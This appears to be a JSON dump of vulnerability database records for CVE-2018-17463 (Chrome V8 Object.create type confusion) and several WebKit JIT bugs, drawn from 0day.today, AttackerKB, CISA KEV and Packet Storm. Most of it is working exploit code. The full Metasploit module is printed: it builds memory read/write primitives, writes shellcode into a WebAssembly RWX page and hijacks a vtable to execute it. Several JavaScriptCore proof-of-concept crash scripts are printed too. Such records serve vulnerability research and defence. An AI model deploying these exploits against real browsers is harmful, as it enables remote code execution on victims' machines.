datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n^\n\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34054", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T12:56:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-13T00:00:00", "type": "zdt", "title": "WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2018-12-13T00:00:00", "id": 
"1337DAY-ID-31778", "href": "https://0day.today/exploit/description/31778", "sourceData": "<!--\nBug:\nvoid JSObject::setPrototypeDirect(VM& vm, JSValue prototype)\n{\n ASSERT(prototype);\n if (prototype.isObject())\n prototype.asCell()->didBecomePrototype();\n \n if (structure(vm)->hasMonoProto()) {\n DeferredStructureTransitionWatchpointFire deferred(vm, structure(vm));\n Structure* newStructure = Structure::changePrototypeTransition(vm, structure(vm), prototype, deferred);\n setStructure(vm, newStructure);\n } else\n putDirect(vm, knownPolyProtoOffset, prototype);\n\n if (!anyObjectInChainMayInterceptIndexedAccesses(vm))\n return;\n \n if (mayBePrototype()) {\n structure(vm)->globalObject()->haveABadTime(vm);\n return;\n }\n \n if (!hasIndexedProperties(indexingType()))\n return;\n \n if (shouldUseSlowPut(indexingType()))\n return;\n\n switchToSlowPutArrayStorage(vm);\n}\n\nJavaScriptCore doesn't allow native arrays to have Proxy objects as prototypes. If we try to set the prototype of an array to a Proxy object, it will end up calling either switchToSlowPutArrayStorage or haveABadTime in the above method. switchToSlowPutArrayStorage will transition the array to a SlowPutArrayStorage array. And haveABadTime will call switchToSlowPutArrayStorage on every object in the VM on a first call. Since subsequent calls to haveABadTime won't have any effect, with two global objects we can create an array having a Proxy object in the prototype chain. 
\n\nExploit:\n case HasIndexedProperty: {\n ArrayMode mode = node->arrayMode();\n \n switch (mode.type()) {\n case Array::Int32:\n case Array::Double:\n case Array::Contiguous:\n case Array::ArrayStorage: {\n break;\n }\n default: {\n clobberWorld();\n break;\n }\n }\n setNonCellTypeForNode(node, SpecBoolean);\n break;\n }\n\nFrom: https://github.com/WebKit/webkit/blob/9ca43a5d4bd8ff63ee7293cac8748d564bd7fbbd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L3481\n\nThe above routine is based on the assumption that if the input array is a native array, it can't intercept indexed accesses therefore it will have no side effects. But actually we can create such arrays which break that assumption making it exploitable.\n\nPoC:\n-->\n\n<body>\n<script>\n\nfunction opt(arr, arr2) {\n arr[1] = 1.1;\n\n let tmp = 0 in arr2;\n\n arr[0] = 2.3023e-320;\n\n return tmp;\n}\n\nfunction main() {\n let o = document.body.appendChild(document.createElement('iframe')).contentWindow;\n\n // haveABadTime\n o.eval(`\nlet p = new Proxy({}, {});\nlet a = {__proto__: {}};\na.__proto__.__proto__ = p;\n`);\n\n let arr = [1.1, 2.2];\n let arr2 = [1.1, 2.2];\n\n let proto = new o.Object();\n let handler = {};\n\n arr2.__proto__ = proto;\n proto.__proto__ = new Proxy({}, {\n has() {\n arr[0] = {};\n\n return true;\n }\n });\n\n for (let i = 0; i < 10000; i++) {\n opt(arr, arr2);\n }\n\n setTimeout(() => {\n delete arr2[0];\n\n opt(arr, arr2);\n\n alert(arr[0]);\n }, 500);\n}\n\nmain();\n\n</script>\n</body>\n", "sourceHref": "https://0day.today/exploit/31778", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-27T14:10:32", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-03T00:00:00", "type": "zdt", "title": "WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-04-03T00:00:00", "id": "1337DAY-ID-32484", "href": "https://0day.today/exploit/description/32484", "sourceData": "WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check\n\n/*\nWhile fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc in current HEAD and release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc on macOS):\n*/\n\n // Run with --thresholdForFTLOptimizeAfterWarmUp=1000\n\n // First array probably required to avoid COW backing storage or so...\n const v3 = [1337,1337,1337,1337];\n const v6 = [1337,1337];\n\n function v7(v8) {\n for (let v9 in v8) {\n v8.a = 42;\n const v10 = v8[-698666199];\n }\n }\n\n while (true) {\n const v14 = v7(v6);\n const v15 = v7(1337);\n }\n\n/*\nNote that the sample requires the FTL JIT threshold to be lowered in order to trigger. 
However, I also have a slightly modified version that (less reliably) crashes with the default threshold which I can share if that is helpful.\n\nFollowing is my preliminary analysis of the crash.\n\nDuring JIT compilation in the FTL tier, the JIT IR for v7 will have the following properties:\n\n* A Structure check will be inserted for v8 due to the property access. The check will ensure that the array is of the correct type at runtime (ArrayWithInt32, with a property 'a')\n* The loop header fetches the array length for the enumeration\n* The element access into v8 is (incorrectly?) speculated to be InBounds, presumably because negative numbers are not actually valid array indices but instead regular property names\n* As a result, the element access will be optimized into a CheckBounds node followed by a GetByVal node (both inside the loop body)\n* The CheckBounds node compares the constant index against the array length which was loaded in the loop header\n\nThe IR for the function will thus look roughly as follows:\n\n # Loop header\n len = LoadArrayLength v8\n // Do other loop header stuff\n\n # Loop body\n CheckStructure v8, expected_structure_id\n StoreProperty v8, 'a', 42\n CheckBounds -698666199, len // Bails out if index is OOB (always in this case...)\n GetByVal v8, -698666199 // Loads the element from the backing storage without performing additional checks\n\n // Jump back to beginning of loop\n\n\nHere is what appears to be happening next during loop-invariant code motion (LICM), an optimization designed to move code inside a loop body in front of the loop if it doesn't need to be executed multiple times:\n\n1. LICM determines that the CheckStructure node can be hoisted in front of the loop header and does so\n2. LICM determines that the CheckBounds node can *not* be hoisted in front of the loop header as it depends on the array length which is only loaded in the loop header\n3. 
LICM determines that the array access (GetByVal) can be hoisted in front of the loop (as it does not depend on any loop variables) and does so\n\nAs a result of the above, the IR is transformed roughly to the following:\n\n StructureCheck v8, expected_structure_id\n GetByVal v8, -698666199\n\n # Loop header\n len = LoadArrayLength v8\n // Do other loop header stuff\n\n # Loop body\n StoreProperty v8, 'a', 42\n CheckBounds -698666199, len\n\n // Jump back to beginning of loop\n\nAs such, the (unchecked) array element access is now located before the loop header with the bounds check only happening afterwards inside the loop body. The provided PoC then crashes while accessing memory 698666199 * 8 bytes before the element vector for v6. It should be possible to turn this bug into arbitrary out-of-bounds access, but I haven't tried that.\n\nHoisting of GetByVal will only happen if safeToExecute (from DFGSafeToExecute.h) returns true. This function appears to only be concerned about type checks, so in this case it concludes that the GetByVal can be moved in front of the loop header as the StructureCheck (performing the type check) is also moved there. 
This seems to be the reason that the property store (v8.a = 42) is required as it forces a CheckStructure node which would otherwise be missing.\n\nThe invocations of v7 with a non-array argument (1337 in this case) seem to be necessary to not trigger a bailout in earlier JIT tiers too often, which would prevent the FTL JIT from ever compiling the function.\n*/\n", "sourceHref": "https://0day.today/exploit/32484", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-26T23:07:25", "description": "WebKit suffers from a JSC JSArray::appendMemcpy uninitialized memory copy vulnerability.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "1337DAY-ID-28183", "href": "https://0day.today/exploit/description/28183", "sourceData": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \r\n\r\nCVE-2017-7064\r\n\r\n\r\nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of JSArray::appendMemcpy.\r\n\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n 
memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\nPoC:\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-01-26] #", "sourceHref": "https://0day.today/exploit/28183", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "attackerkb": [{"lastseen": "2022-06-08T19:56:40", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-11-14T00:00:00", "type": "attackerkb", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-07-30T00:00:00", "id": "AKB:1FEA5875-DB2E-48AA-A4F4-0E24C3124828", "href": "https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", 
"description": "Google Chromium V8 Engine contains an unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2022-06-08T00:00:00", "id": "CISA-KEV-CVE-2018-17463", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-06T22:52:32", "description": "", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-17463"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156640", "href": "https://packetstormsecurity.com/files/156640/Google-Chrome-67-68-69-Object.create-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n 
\nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit', \n'Description' => %q{ \nThis modules exploits a type confusion in Google Chromes JIT compiler. \nThe Object.create operation can be used to cause a type confusion between a \nPropertyArray and a NameDictionary. \nThe payload is executed within the rwx region of the sandboxed renderer \nprocess, so the browser must be run with the --no-sandbox option for the \npayload to work. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'saelo', # discovery and exploit \n'timwr', # metasploit module \n], \n'References' => [ \n['CVE', '2018-17463'], \n['URL', 'http://www.phrack.org/papers/jit_exploitation.html'], \n['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'], \n['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'], \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => ['windows', 'osx'], \n'DefaultTarget' => 0, \n'Targets' => [ [ 'Automatic', { } ] ], \n'DisclosureDate' => 'Sep 25 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \n \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] \" + request.body) \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \n \njscript = %Q^ \nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]); \n \nlet ab = new ArrayBuffer(8); \nlet floatView = new Float64Array(ab); \nlet uint64View = new BigUint64Array(ab); \nlet uint8View = new Uint8Array(ab); \n 
\nNumber.prototype.toBigInt = function toBigInt() { \nfloatView[0] = this; \nreturn uint64View[0]; \n}; \n \nBigInt.prototype.toNumber = function toNumber() { \nuint64View[0] = this; \nreturn floatView[0]; \n}; \n \nfunction hex(n) { \nreturn '0x' + n.toString(16); \n}; \n \nfunction fail(s) { \nprint('FAIL ' + s); \nthrow null; \n} \n \nconst NUM_PROPERTIES = 32; \nconst MAX_ITERATIONS = 100000; \n \nfunction gc() { \nfor (let i = 0; i < 200; i++) { \nnew ArrayBuffer(0x100000); \n} \n} \n \nfunction make(properties) { \nlet o = {inline: 42} // TODO \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \neval(`o.p${i} = properties[${i}];`); \n} \nreturn o; \n} \n \nfunction pwn() { \nfunction find_overlapping_properties() { \nlet propertyNames = []; \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \npropertyNames[i] = `p${i}`; \n} \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \n${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')} \nreturn [${propertyNames.join(', ')}]; \n} \n`); \n \nlet propertyValues = []; \nfor (let i = 1; i < NUM_PROPERTIES; i++) { \npropertyValues[i] = -i; \n} \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \nlet r = vuln(make(propertyValues)); \nif (r[1] !== -1) { \nfor (let i = 1; i < r.length; i++) { \nif (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) { \nreturn [i, -r[i]]; \n} \n} \n} \n} \n \nfail(\"Failed to find overlapping properties\"); \n} \n \nfunction addrof(obj) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nreturn o.p${p1}.x1; \n} \n`); \n \nlet propertyValues = []; \npropertyValues[p1] = {x1: 13.37, x2: 13.38}; \npropertyValues[p2] = {y1: obj}; \n \nlet i = 0; \nfor (; i < MAX_ITERATIONS; i++) { \nlet res = vuln(make(propertyValues)); \nif (res !== 13.37) \nreturn res.toBigInt() \n} \n \nfail(\"Addrof failed\"); \n} \n \nfunction corrupt_arraybuffer(victim, newValue) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nlet orig = 
o.p${p1}.x2; \no.p${p1}.x2 = ${newValue.toNumber()}; \nreturn orig; \n} \n`); \n \nlet propertyValues = []; \nlet o = {x1: 13.37, x2: 13.38}; \npropertyValues[p1] = o; \npropertyValues[p2] = victim; \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \no.x2 = 13.38; \nlet r = vuln(make(propertyValues)); \nif (r !== 13.38) \nreturn r.toBigInt(); \n} \n \nfail(\"Corrupt ArrayBuffer failed\"); \n} \n \nlet [p1, p2] = find_overlapping_properties(); \nprint(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`); \n \nlet memview_buf = new ArrayBuffer(1024); \nlet driver_buf = new ArrayBuffer(1024); \n \ngc(); \n \nlet memview_buf_addr = addrof(memview_buf); \nmemview_buf_addr--; \nprint(`ArrayBuffer @ ${hex(memview_buf_addr)}`); \n \nlet original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr); \n \nlet driver = new BigUint64Array(driver_buf); \nlet original_memview_buf_ptr = driver[4]; \n \nlet memory = { \nwrite(addr, bytes) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nmemview.set(bytes); \n}, \nread(addr, len) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nreturn memview.subarray(0, len); \n}, \nreadPtr(addr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nreturn memview[0]; \n}, \nwritePtr(addr, ptr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nmemview[0] = ptr; \n}, \naddrof(obj) { \nmemview_buf.leakMe = obj; \nlet props = this.readPtr(memview_buf_addr + 8n); \nreturn this.readPtr(props + 15n) - 1n; \n}, \n}; \n \n// Generate a RWX region for the payload \nfunction get_wasm_instance() { \nvar buffer = new Uint8Array([ \n0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0, \n1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128, \n128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104, \n101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11 \n]); \nreturn new 
WebAssembly.Instance(new WebAssembly.Module(buffer),{}); \n} \n \nlet wasm_instance = get_wasm_instance(); \nlet wasm_addr = memory.addrof(wasm_instance); \nprint(\"wasm_addr @ \" + hex(wasm_addr)); \nlet wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n); \nprint(\"wasm_rwx @ \" + hex(wasm_rwx_addr)); \n \nmemory.write(wasm_rwx_addr, shellcode); \n \nlet fake_vtab = new ArrayBuffer(0x80); \nlet fake_vtab_u64 = new BigUint64Array(fake_vtab); \nlet fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n); \n \nlet div = document.createElement('div'); \nlet div_addr = memory.addrof(div); \nprint('div_addr @ ' + hex(div_addr)); \nlet el_addr = memory.readPtr(div_addr + 0x20n); \nprint('el_addr @ ' + hex(div_addr)); \n \nfake_vtab_u64.fill(wasm_rwx_addr, 6, 10); \nmemory.writePtr(el_addr, fake_vtab_addr); \n \nprint('Triggering...'); \n \n// Trigger virtual call \ndiv.dispatchEvent(new Event('click')); \n \n// We are done here, repair the corrupted array buffers \nlet addr = memory.addrof(driver_buf); \nmemory.writePtr(addr + 32n, original_driver_buf_ptr); \nmemory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr); \n} \n \npwn(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \n \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156640/chrome_object_create.rb.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2018-12-12T10:40:37", "description": "", "cvss3": {}, "published": "2018-12-12T00:00:00", "type": "packetstorm", "title": "WebKit JIT Proxy Object Issue", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4438"], "modified": "2018-12-12T00:00:00", "id": "PACKETSTORM:150746", "href": "https://packetstormsecurity.com/files/150746/WebKit-JIT-Proxy-Object-Issue.html", "sourceData": "`WebKit: JIT: Int32/Double arrays can have Proxy objects in the prototype chains \n \nCVE-2018-4438 \n \n \nBug: \nvoid JSObject::setPrototypeDirect(VM& vm, JSValue prototype) \n{ \nASSERT(prototype); \nif (prototype.isObject()) \nprototype.asCell()->didBecomePrototype(); \n \nif (structure(vm)->hasMonoProto()) { \nDeferredStructureTransitionWatchpointFire deferred(vm, structure(vm)); \nStructure* newStructure = Structure::changePrototypeTransition(vm, structure(vm), prototype, deferred); \nsetStructure(vm, newStructure); \n} else \nputDirect(vm, knownPolyProtoOffset, prototype); \n \nif (!anyObjectInChainMayInterceptIndexedAccesses(vm)) \nreturn; \n \nif (mayBePrototype()) { \nstructure(vm)->globalObject()->haveABadTime(vm); \nreturn; \n} \n \nif (!hasIndexedProperties(indexingType())) \nreturn; \n \nif (shouldUseSlowPut(indexingType())) \nreturn; \n \nswitchToSlowPutArrayStorage(vm); \n} \n \nJavaScriptCore doesn't allow native arrays to have Proxy objects as prototypes. If we try to set the prototype of an array to a Proxy object, it will end up calling either switchToSlowPutArrayStorage or haveABadTime in the above method. switchToSlowPutArrayStorage will transition the array to a SlowPutArrayStorage array. And haveABadTime will call switchToSlowPutArrayStorage on every object in the VM on a first call. Since subsequent calls to haveABadTime won't have any effect, with two global objects we can create an array having a Proxy object in the prototype chain. 
\n \nExploit: \ncase HasIndexedProperty: { \nArrayMode mode = node->arrayMode(); \n \nswitch (mode.type()) { \ncase Array::Int32: \ncase Array::Double: \ncase Array::Contiguous: \ncase Array::ArrayStorage: { \nbreak; \n} \ndefault: { \nclobberWorld(); \nbreak; \n} \n} \nsetNonCellTypeForNode(node, SpecBoolean); \nbreak; \n} \n \nFrom: https://github.com/WebKit/webkit/blob/9ca43a5d4bd8ff63ee7293cac8748d564bd7fbbd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L3481 \n \nThe above routine is based on the assumption that if the input array is a native array, it can't intercept indexed accesses therefore it will have no side effects. But actually we can create such arrays which break that assumption making it exploitable to lead to type confusion. \n \nPoC: \n<body> \n<script> \n \nfunction opt(arr, arr2) { \narr[1] = 1.1; \n \nlet tmp = 0 in arr2; \n \narr[0] = 2.3023e-320; \n \nreturn tmp; \n} \n \nfunction main() { \nlet o = document.body.appendChild(document.createElement('iframe')).contentWindow; \n \n// haveABadTime \no.eval(` \nlet p = new Proxy({}, {}); \nlet a = {__proto__: {}}; \na.__proto__.__proto__ = p; \n`); \n \nlet arr = [1.1, 2.2]; \nlet arr2 = [1.1, 2.2]; \n \nlet proto = new o.Object(); \nlet handler = {}; \n \narr2.__proto__ = proto; \nproto.__proto__ = new Proxy({}, { \nhas() { \narr[0] = {}; \n \nreturn true; \n} \n}); \n \nfor (let i = 0; i < 10000; i++) { \nopt(arr, arr2); \n} \n \nsetTimeout(() => { \ndelete arr2[0]; \n \nopt(arr, arr2); \n \nalert(arr[0]); \n}, 500); \n} \n \nmain(); \n \n</script> \n</body> \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. 
